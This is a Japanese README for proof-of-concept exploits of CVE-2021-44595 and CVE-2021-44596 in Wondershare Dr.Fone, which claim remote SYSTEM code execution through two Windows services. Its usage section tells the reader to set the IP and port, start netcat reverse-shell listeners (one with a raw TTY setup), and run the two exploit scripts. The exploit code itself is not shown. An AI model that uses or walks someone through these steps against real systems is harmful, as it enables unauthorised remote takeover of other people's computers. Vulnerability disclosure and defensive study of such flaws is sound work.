
Wondershare Dr.Fone の脆弱性 CVE-2021-44595 および CVE-2021-44596 に対する Proof-of-Concept エクスプロイト。脆弱なサービスを介して SYSTEM としてリモートコード実行を可能にします。
BugSec のセキュリティ研究者である Netanel Cohen と Tomer Peled。
Wondershare Dr.Fone を悪用する POC の例。
Dr.Fone は wondershare が開発したフォントールキットであり、RCE に対して脆弱です。
ネットワークアクセスのみで、SYSTEM ユーザーとしてリモートコードを実行することができます。
脆弱なサービス:
InstallAssistService.exe
ElevationService.exe
テスト済みバージョン: 12.0.7、11.4
IP とポートを変更して実行します。
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py